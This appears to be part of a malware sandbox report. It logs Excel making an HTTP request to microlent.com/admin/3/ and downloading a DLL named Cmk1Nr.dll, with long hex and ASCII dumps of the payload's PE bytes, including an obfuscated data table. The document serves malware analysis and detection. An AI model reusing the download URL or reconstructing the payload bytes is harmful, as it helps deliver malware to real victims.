                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@B
                                                                  May 23, 2022 09:56:44.910299063 CEST636INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: H\$H
                                                                  May 23, 2022 09:56:44.910352945 CEST637INData Raw: 45 e4 30 6b 6a 2e c7 45 e8 8f 78 69 79 c7 45 ec 3a 09 21 40 c7 45 f0 98 3d 4d 14 c7 45 f4 1c 42 0d 58 c7 45 f8 af 0c 0e 36 c7 45 fc 3b 23 15 74 c7 45 00 b1 07 11 49 c7 45 04 3c 0f 2a 31 c7 45 08 b5 23 5c 56 c7 45 0c 16 22 0e 75 c7 45 10 b1 1b 41
                                                                  Data Ascii: E0kj.ExiyE:!@E=MEBXE6E;#tEIE<*1E#\VE"uEAwEYPE"wEV!E .aE$"a/E(:S9E,TE0<E4mE8_oE<2E@FED;EH7EL-EPqETT] EX,E\oaE`XBEdEh9';El
                                                                  May 23, 2022 09:56:44.910408020 CEST639INData Raw: 1e 59 0b 65 c7 85 2c 02 00 00 0a b9 17 4e c7 85 30 02 00 00 3a 8f 79 e5 c7 85 34 02 00 00 62 1f 1c 25 c7 85 38 02 00 00 e3 1a d5 06 c7 85 3c 02 00 00 3e 02 4e a8 c7 85 40 02 00 00 6f d8 3b 45 c7 85 44 02 00 00 13 28 37 ab c7 85 48 02 00 00 70 c2
                                                                  Data Ascii: Ye,N0:y4b%8<>N@o;ED(7Hp PL5P6CT& X2{\ePO`/CdTG0h}WLltuOp:Yt(2Bx<v:|X-n'qR
                                                                  May 23, 2022 09:56:45.079282045 CEST640INData Raw: 00 00 26 5c 68 52 c7 85 44 04 00 00 8b 5f 6c b5 c7 85 48 04 00 00 62 eb 89 02 c7 85 4c 04 00 00 2b 71 82 19 c7 85 50 04 00 00 d7 3e ce b8 c7 85 54 04 00 00 e1 6a 66 58 c7 85 58 04 00 00 04 8d b6 f3 c7 85 5c 04 00 00 ff f7 43 62 c7 85 60 04 00 00
                                                                  Data Ascii: &\hRD_lHbL+qP>TjfXX\Cb`42dq?h4%llpsoKt#xi|>l|%c$mH*.\tG5qj'EBgx+
                                                                  May 23, 2022 09:56:45.079307079 CEST642INData Raw: 58 06 00 00 35 81 b2 06 c7 85 5c 06 00 00 a3 eb a0 9b c7 85 60 06 00 00 db 54 67 39 c7 85 64 06 00 00 e7 6f 45 e9 c7 85 68 06 00 00 f2 b7 b7 75 c7 85 6c 06 00 00 12 ca 43 65 c7 85 70 06 00 00 64 9c 96 24 c7 85 74 06 00 00 22 b8 61 56 c7 85 78 06
                                                                  Data Ascii: X5\`Tg9doEhulCepd$t"aVx#d|?N3]='O5[(;.,:'U@et%</LIOf^e7Eekg$
                                                                  May 23, 2022 09:56:45.079324007 CEST643INData Raw: c7 85 70 08 00 00 e0 b7 b7 78 c7 85 74 08 00 00 f6 dc 23 24 c7 85 78 08 00 00 47 af 12 7a c7 85 7c 08 00 00 a4 a8 51 5b c7 85 80 08 00 00 ce b2 6e 73 c7 85 84 08 00 00 c0 0f b2 8b c7 85 88 08 00 00 6d 1b 4b f8 c7 85 8c 08 00 00 a6 61 81 bf c7 85
                                                                  Data Ascii: pxt#$xGz|Q[nsmKa?<J(+y@p3zmm7jue75@ } z$*JZxn
                                                                  May 23, 2022 09:56:45.079339981 CEST644INData Raw: 85 84 0a 00 00 60 41 6e 4d c7 85 88 0a 00 00 4b ba c2 33 c7 85 8c 0a 00 00 ff b1 ce 2a c7 85 90 0a 00 00 e1 1c 6c 3f c7 85 94 0a 00 00 84 78 75 a6 c7 85 98 0a 00 00 4f 93 4b 78 c7 85 9c 0a 00 00 28 d3 1a 37 c7 85 a0 0a 00 00 26 29 a0 c3 c7 85 a4
                                                                  Data Ascii: `AnMK3*l?xuOKx(7&).Rtp9:|e:NKf3HuHBE3E3FH$A@A0H$L$H
                                                                  May 23, 2022 09:56:45.079356909 CEST646INData Raw: 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad 00 00 00 e8 9e 54 00 00 85 c0 75 07 33 c0 e9 a9 01 00 00 e8 5e 09 00 00 85 c0 75 0c e8 f5 54 00 00 33 c0 e9 94 01 00 00 e8 f9 53 00 00 ff 15 6b ec 01 00 48 89 05 9c b3 02 00 e8 77 52 00 00 48 89 05
                                                                  Data Ascii: L$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk|$XuY=X~DPH=]u<eH`
                                                                  May 23, 2022 09:56:45.079374075 CEST647INData Raw: 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48 89 44 24 40 48 8b 84 24 c8 00 00 00 8b 40 48 89 44 24 30 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 88 00 00 00 8b 00 39 44 24 30 0f 83 b6 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c 24 88 00 00
                                                                  Data Ascii: HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H3D$0HkH$DHD$xHD$pH$HL$8T$pD$H|$
                                                                  May 23, 2022 09:56:45.079385996 CEST648INData Raw: 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 96 f7 01 00 48 89 88 a0 00 00 00 48 8b 44 24 30 c7 40 10 00 00 00 00 48 8b 44 24 30 c7 40 1c 01 00 00 00 48 8b 44 24 30 c7 80
                                                                  Data Ascii: RH(HT$HL$H(HD$0HHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL$8HHD$0HuHD$0H"xHHD$0H


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.2249173103.195.4.8443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-05-23 07:56:38 UTC0OUTGET /admin/3/ HTTP/1.1
                                                                  Accept: */*
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: microlent.com
                                                                  Connection: Keep-Alive
                                                                  2022-05-23 07:56:38 UTC0INHTTP/1.1 200 OK
                                                                  Cache-Control: no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  Content-Type: application/x-msdownload
                                                                  Expires: Mon, 23 May 2022 07:56:38 GMT
                                                                  Last-Modified: Mon, 23 May 2022 07:56:38 GMT
                                                                  Server: Microsoft-IIS/10.0
                                                                  Set-Cookie: 628b3e36b6ff2=1653292598; expires=Mon, 23-May-2022 07:57:38 GMT; Max-Age=60; path=/
                                                                  Content-Disposition: attachment; filename="Cmk1Nr.dll"
                                                                  Content-Transfer-Encoding: binary
                                                                  X-Powered-By: ASP.NET
                                                                  X-Powered-By-Plesk: PleskWin
                                                                  Date: Mon, 23 May 2022 07:56:38 GMT
                                                                  Connection: close
                                                                  Content-Length: 365056
                                                                  2022-05-23 07:56:38 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b"
                                                                  2022-05-23 07:56:38 UTC16INData Raw: 75 1c 83 7c 24 30 00 74 15 e8 4c 61 00 00 48 85 c0 74 0b e8 42 61 00 00 8b 4c 24 30 89 08 48 8b 44 24 38 48 83 c4 48 c3 cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 b9 04 00 00 00 e8 de 48 00 00 90 c7 44 24 28 01 00 00 00 8b 44 24 70 89 44 24 20 4c 8b 4c 24 68 44 8b 44 24 60 48 8d 54 24 58 48 8b 4c 24 50 e8 24 00 00 00 48 89 44 24 30 b9 04 00 00 00 e8 05 49 00 00 48 8b 44 24 30 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 88 00 00 00 c7 44 24 48 00 00 00 00 48 8b 84 24 98 00 00 00 48 8b 00 48 89 44 24 40 48 83 bc 24 90 00 00 00 00 75 26 44 8b 8c 24 b0 00 00 00 4c 8b 84 24 a8 00 00 00 8b 94 24 a0 00 00 00 48 8b 4c 24 40 e8 c1 f7 ff ff e9 52 08 00 00 83
                                                                  Data Ascii: u|$0tLaHtBaL$0HD$8HHLL$ DD$HT$HL$HHHD$(D$pD$ LL$hDD$`HT$XHL$P$HD$0IHD$0HHLL$ DD$HT$HL$HD$HH$HHD$@H$u&D$L$$HL$@R
                                                                  2022-05-23 07:56:38 UTC32INData Raw: 00 48 39 44 24 28 75 0f 48 b8 33 a2 df 2d 99 2b 00 00 48 89 44 24 28 48 8b 44 24 28 48 89 05 1f 26 02 00 48 8b 44 24 28 48 f7 d0 48 89 05 18 26 02 00 48 83 c4 48 c3 cc cc cc 48 89 54 24 10 89 4c 24 08 48 83 ec 28 81 7c 24 30 63 73 6d e0 75 12 48 8b 54 24 38 8b 4c 24 30 e8 0b 00 00 00 eb 04 eb 02 33 c0 48 83 c4 28 c3 48 89 54 24 10 89 4c 24 08 48 83 ec 58 e8 de b4 ff ff 48 89 44 24 28 48 83 7c 24 28 00 75 07 33 c0 e9 73 02 00 00 48 8b 44 24 28 48 8b 90 a0 00 00 00 8b 4c 24 60 e8 65 02 00 00 48 89 44 24 20 48 83 7c 24 20 00 75 0b 48 c7 44 24 40 00 00 00 00 eb 0e 48 8b 44 24 20 48 8b 40 08 48 89 44 24 40 48 83 7c 24 40 00 75 07 33 c0 e9 29 02 00 00 48 83 7c 24 40 05 75 17 48 8b 44 24 20 48 c7 40 08 00 00 00 00 b8 01 00 00 00 e9 0a 02 00 00 48 83 7c 24 40 01
                                                                  Data Ascii: H9D$(uH3-+HD$(HD$(H&HD$(HH&HHHT$L$H(|$0csmuHT$8L$03H(HT$L$HXHD$(H|$(u3sHD$(HL$`eHD$ H|$ uHD$@HD$ H@HD$@H|$@u3)H|$@uHD$ H@H|$@
                                                                  2022-05-23 07:56:39 UTC48INData Raw: 48 89 05 8b 1d 02 00 48 83 7c 24 30 00 75 07 b8 18 00 00 00 eb 0e 48 8b 44 24 30 48 c7 00 00 00 00 00 33 c0 48 83 c4 48 c3 cc 48 83 ec 38 c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 48 63 44 24 20 48 83 f8 0a 73 28 48 63 44 24 20 48 8d 0d c1 f3 01 00 48 8b 0c c1 ff 15 6f 56 01 00 48 63 4c 24 20 48 8d 15 ab f3 01 00 48 89 04 ca eb c3 48 83 c4 38 c3 48 83 ec 28 b9 03 00 00 00 e8 22 62 00 00 83 f8 01 74 17 b9 03 00 00 00 e8 13 62 00 00 85 c0 75 1d 83 3d 70 f9 01 00 01 75 14 b9 fc 00 00 00 e8 7c 00 00 00 b9 ff 00 00 00 e8 72 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 18 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff c0 89 04 24 48 63 04 24 48 83 f8 16 73 30 48 63 04 24 48 6b c0 10 48 8d 0d 9e 85 01 00 8b 04 01
                                                                  Data Ascii: HH|$0uHD$0H3HHH8D$ D$ D$ HcD$ Hs(HcD$ HHoVHcL$ HHH8H("btbu=pu|rH(L$H$$$Hc$Hs0Hc$HkH
                                                                  2022-05-23 07:56:39 UTC64INData Raw: 00 00 e8 13 0c 00 00 48 63 8c 24 10 81 00 00 48 8d 15 24 b5 01 00 48 89 94 24 d8 80 00 00 48 c7 44 24 20 00 00 00 00 4c 8d 8c 24 a4 70 00 00 44 8b c0 48 8d 94 24 60 10 00 00 48 8b 84 24 d8 80 00 00 48 8b 0c c8 ff 15 fe 17 01 00 85 c0 74 05 e9 53 01 00 00 ff 15 9f 16 01 00 83 f8 06 74 05 e9 43 01 00 00 48 c7 84 24 b0 80 00 00 00 00 00 00 48 c7 44 24 20 ff ff ff ff 4c 8d 8c 24 60 10 00 00 41 b8 00 10 00 00 48 8d 94 24 b0 70 00 00 48 8d 8c 24 b0 80 00 00 e8 8d 78 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 7b 02 00 00 48 8d 0d 15 57 01 00 48 89 4c 24 28 48 8d 0d 09 63 01 00 48 89 4c 24 20 4c 8d 0d ed 5c 01 00 41 b8 22 00 00 00 ba 16 00 00 00 8b c8 e8 eb 63 ff ff 89 84 24 b8 80 00 00 83 bc 24 b8 80 00 00 00 74 60 83 bc 24 b8 80 00 00 50 74 56 48 8d 8c 24 60
                                                                  Data Ascii: Hc$H$H$HD$ L$pDH$`H$HtStCH$HD$ L$`AH$pH$xHD$8D$0{HWHL$(HcHL$ L\A"c$$t`$PtVH$`
                                                                  2022-05-23 07:56:39 UTC80INData Raw: 00 00 81 38 52 43 43 e0 74 53 48 8b 84 24 e8 00 00 00 48 89 44 24 30 8b 84 24 e0 00 00 00 89 44 24 28 48 8b 84 24 d0 00 00 00 48 89 44 24 20 4c 8b 8c 24 c8 00 00 00 4c 8b 84 24 c0 00 00 00 48 8b 94 24 b8 00 00 00 48 8b 8c 24 b0 00 00 00 e8 86 9f ff ff 85 c0 74 05 e9 93 02 00 00 48 8b 84 24 d0 00 00 00 83 78 0c 00 74 02 eb 05 e8 38 85 ff ff 48 8b 84 24 c8 00 00 00 48 89 44 24 30 48 8d 44 24 6c 48 89 44 24 28 48 8d 44 24 68 48 89 44 24 20 44 8b 8c 24 d8 00 00 00 44 8b 84 24 e0 00 00 00 48 8b 94 24 d0 00 00 00 48 8b 8c 24 b8 00 00 00 e8 a2 9f ff ff 48 89 44 24 60 eb 18 8b 44 24 68 ff c0 89 44 24 68 48 8b 44 24 60 48 83 c0 14 48 89 44 24 60 8b 44 24 6c 39 44 24 68 0f 83 0b 02 00 00 48 8b 44 24 60 8b 00 39 84 24 d8 00 00 00 0f 8c 5c 01 00 00 48 8b 44 24 60 8b
                                                                  Data Ascii: 8RCCtSH$HD$0$D$(H$HD$ L$L$H$H$tH$xt8H$HD$0HD$lHD$(HD$hHD$ D$D$H$H$HD$`D$hD$hHD$`HHD$`D$l9D$hHD$`9$\HD$`
                                                                  2022-05-23 07:56:39 UTC96INData Raw: e8 75 f9 ff ff 89 44 24 30 33 c0 48 8b 8c 24 90 00 00 00 48 8b 94 24 98 00 00 00 66 89 44 51 fe 83 7c 24 30 fe 75 2a 48 83 bc 24 a0 00 00 00 ff 75 1f e8 23 21 ff ff 83 38 22 75 0b e8 19 21 ff ff 8b 4c 24 34 89 08 b8 ff ff ff ff e9 00 02 00 00 83 7c 24 30 00 0f 8d 33 01 00 00 33 c0 48 8b 8c 24 90 00 00 00 66 89 01 48 83 bc 24 98 00 00 00 ff 74 6c 48 81 bc 24 98 00 00 00 ff ff ff 7f 74 5e 48 83 bc 24 98 00 00 00 01 76 53 48 8b 84 24 98 00 00 00 48 ff c8 48 39 05 cb 25 01 00 73 0e 48 8b 05 c2 25 01 00 48 89 44 24 58 eb 10 48 8b 84 24 98 00 00 00 48 ff c8 48 89 44 24 58 48 8b 44 24 58 48 d1 e0 48 8b 8c 24 90 00 00 00 48 83 c1 02 4c 8b c0 ba fe 00 00 00 e8 fa a7 fe ff 83 7c 24 30 fe 0f 85 9a 00 00 00 33 c0 85 c0 74 0a c7 44 24 60 01 00 00 00 eb 08 c7 44 24 60
                                                                  Data Ascii: uD$03H$H$fDQ|$0u*H$u#!8"u!L$4|$033H$fH$tlH$t^H$vSH$HH9%sH%HD$XH$HHD$XHD$XHH$HL|$03tD$`D$`
                                                                  2022-05-23 07:56:39 UTC112INData Raw: 24 af 02 00 00 48 2b 44 24 40 89 44 24 68 48 8b 44 24 40 48 ff c0 48 89 44 24 40 8b 44 24 50 25 00 02 00 00 85 c0 74 33 83 7c 24 68 00 74 0d 48 8b 44 24 40 0f be 00 83 f8 30 74 1f 48 8b 44 24 40 48 ff c8 48 89 44 24 40 48 8b 44 24 40 c6 00 30 8b 44 24 68 ff c0 89 44 24 68 83 7c 24 6c 00 0f 85 32 02 00 00 8b 44 24 50 83 e0 40 85 c0 74 4e 8b 44 24 50 25 00 01 00 00 85 c0 74 0f c6 44 24 54 2d c7 44 24 5c 01 00 00 00 eb 32 8b 44 24 50 83 e0 01 85 c0 74 0f c6 44 24 54 2b c7 44 24 5c 01 00 00 00 eb 18 8b 44 24 50 83 e0 02 85 c0 74 0d c6 44 24 54 20 c7 44 24 5c 01 00 00 00 8b 44 24 68 8b 4c 24 58 2b c8 8b c1 2b 44 24 5c 89 84 24 48 03 00 00 8b 44 24 50 83 e0 0c 85 c0 75 1e 4c 8d 8c 24 b0 02 00 00 4c 8b 84 24 40 04 00 00 8b 94 24 48 03 00 00 b1 20 e8 3b 04 00 00
                                                                  Data Ascii: $H+D$@D$hHD$@HHD$@D$P%t3|$htHD$@0tHD$@HHD$@HD$@0D$hD$h|$l2D$P@tND$P%tD$T-D$\2D$PtD$T+D$\D$PtD$T D$\D$hL$X++D$\$HD$PuL$L$@$H ;
                                                                  2022-05-23 07:56:39 UTC128INData Raw: ff ff ff ff 33 c0 85 c0 75 2e 48 8d 05 f9 74 00 00 48 89 44 24 20 45 33 c9 41 b8 45 00 00 00 48 8d 15 64 80 00 00 b9 02 00 00 00 e8 aa a9 fe ff 83 f8 01 75 03 cc 33 c0 8b 4c 24 60 e8 a9 f1 ff ff 8b 44 24 30 48 83 c4 58 c3 89 4c 24 08 48 83 ec 58 48 63 44 24 60 48 83 f8 fe 75 20 e8 28 a1 fe ff c7 00 00 00 00 00 e8 ed a0 fe ff c7 00 09 00 00 00 b8 ff ff ff ff e9 1a 02 00 00 83 7c 24 60 00 7c 16 8b 05 e4 da 00 00 39 44 24 60 73 0a c7 44 24 3c 01 00 00 00 eb 08 c7 44 24 3c 00 00 00 00 8b 44 24 3c 89 44 24 34 83 7c 24 34 00 75 2e 48 8d 05 a2 75 00 00 48 89 44 24 20 45 33 c9 41 b8 2e 00 00 00 48 8d 15 ed 89 00 00 b9 02 00 00 00 e8 03 a9 fe ff 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 49 e8 9f a0 fe ff c7 00 00 00 00 00 e8 64 a0 fe ff c7 00 09 00 00 00 48 c7 44
                                                                  Data Ascii: 3u.HtHD$ E3AEHdu3L$`D$0HXL$HXHcD$`Hu (|$`|9D$`sD$<D$<D$<D$4|$4u.HuHD$ E3A.Hu3|$4uIdHD
                                                                  2022-05-23 07:56:39 UTC144INData Raw: 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 77 00 69 00 6e 00 73 00 69 00 67 00 2e 00 63 00 00 00 00 00 00 00 00 00 28 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 73 00 69 00 67 00 6e 00 61 00 6c 00 20 00 6f 00 72 00 20 00 65 00 72 00 72 00 6f 00 72 00 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 72 00 61 00 69 00 73 00 65 00 00 00 00 00 00 00 28 00 4c 00 22 00 42 00 75 00 66 00 66 00 65 00 72 00 20 00 69 00 73 00 20 00 74 00 6f 00 6f 00 20 00 73 00 6d 00 61 00 6c 00 6c 00 22 00 20 00 26 00 26 00 20 00 30 00 29 00 00 00 00 00 00 00 42 00 75 00 66 00 66 00 65 00 72 00 20 00 69 00 73 00 20 00 74 00 6f 00 6f 00 20 00 73 00 6d 00 61 00 6c 00 6c
                                                                  Data Ascii: ld\self_64_amd64\crt\src\winsig.c("Invalid signal or error", 0)raise(L"Buffer is too small" && 0)Buffer is too small
                                                                  2022-05-23 07:56:39 UTC160INData Raw: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bf 02 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 b8 95 02 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bf 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 38 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 50 96 02 00 00 00 00 00 00 00 00 00 10 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 70 c3 02 00 88 96 02 00 60 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 a0 96 02 00 00 00 00 00 00 00 00 00 b0 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 70 c3 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 88 96 02 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: P@x@8Pp`p@
                                                                  2022-05-23 07:56:39 UTC176INData Raw: 3a 7c 55 25 2f fb 86 43 0a e9 ed 3e d4 9c df 52 d1 64 64 23 04 34 1d bd 60 71 09 0a 56 65 00 89 75 4f 5e 9a 39 31 4d f6 32 42 70 a4 33 3a 69 10 53 fa 04 6e 4c 78 10 ef 1e 75 5c b4 32 67 05 34 81 66 58 c4 06 43 48 2a e3 04 6d bf 32 7b 55 7f 1e 66 55 20 e0 e3 a7 a9 7a 24 55 7d e0 b7 aa 8c 4e 31 6b 26 5d 89 71 4e e9 9d 25 05 af 17 7d 20 d5 00 23 22 29 a0 a3 00 69 ed 5b d4 35 86 43 35 35 e1 b7 3e 66 ba df 78 ca 63 43 23 b5 94 a0 6a 37 35 79 66 74 0d 5c ad 54 7e 6d 54 25 51 63 eb c2 4c 78 50 bb 2c 99 7d c6 71 72 2a 43 e4 12 42 aa 2a e8 63 e4 76 4c 70 62 e5 9e 71 33 f6 36 10 7d f2 86 26 11 ce aa 8f d6 86 62 43 51 f4 ff 1b 41 07 7d b7 60 9d d6 65 65 e6 3e 00 7d 46 44 26 68 c7 0a 15 47 24 1d 45 3c 05 b4 b6 13 25 e3 1b 5d 4d a6 cb 0e 6f 6b d0 26 0d a6 97 da 28 11
                                                                  Data Ascii: :|U%/C>Rdd#4`qVeuO^91M2Bp3:iSnLxu\2g4fXCH*m2{UfU z$U}N1k&]qN%} #")i[5C55>fxcC#j75yft\T~mT%QcLxP,}qr*CB*cvLpbq36}&bCQA}`ee>}FD&hG$E<%]Mok&(
                                                                  2022-05-23 07:56:39 UTC192INData Raw: f4 07 ad 27 67 52 db 00 aa 65 bc 79 18 55 25 e0 a5 92 c0 3b af 97 12 a1 fa 81 03 84 f0 82 6c d7 04 18 7d f0 12 42 70 2c de 0d 4d 68 3c 33 85 2b e3 04 0e 56 d3 1d 48 05 fd 17 11 49 e1 2a 7c 05 41 b6 39 e3 73 84 26 10 46 91 a3 c6 35 fd 09 40 5b 6c ee 6d 5e 14 a2 d8 40 e1 b9 e9 4d fb aa 83 58 c1 70 69 01 f7 22 64 14 24 b2 96 a7 d1 5f 4b 1a b3 50 d1 99 d1 15 48 05 ff 07 11 41 e1 2a 7c 0d f9 63 5c 59 ab 02 eb 3d b1 1b 41 07 8d 7d 46 64 ea 2b 41 11 a5 61 78 ca ea 5f 4c 30 dd a7 40 99 d5 0c 18 7d b8 32 42 70 6c dc bd 41 9b 18 a8 83 72 e3 cc 0e ee 5a 51 6c 71 fd d7 11 f1 6a 66 58 08 f9 bf f1 2e 47 6b 26 bd 22 7b 45 df 9d 90 64 64 ac 23 41 19 a6 a4 57 39 ac 6f 4c 3c 18 74 64 6a 99 0c 18 0d 9b e6 6b 40 e3 1b 5d 59 65 11 54 6f 92 ef 29 32 e0 1b da a6 b4 3a 67 05 93
                                                                  Data Ascii: 'gReyU%;l}Bp,Mh<3+VHI*|A9s&F5@[lm^@MXpi"d$_KPHA*|c\Y=A}Fd+Aax_L0@}2BplArZQlqjfX.Gk&"{Edd#AW9oL<tdjk@]YeTo)2:g
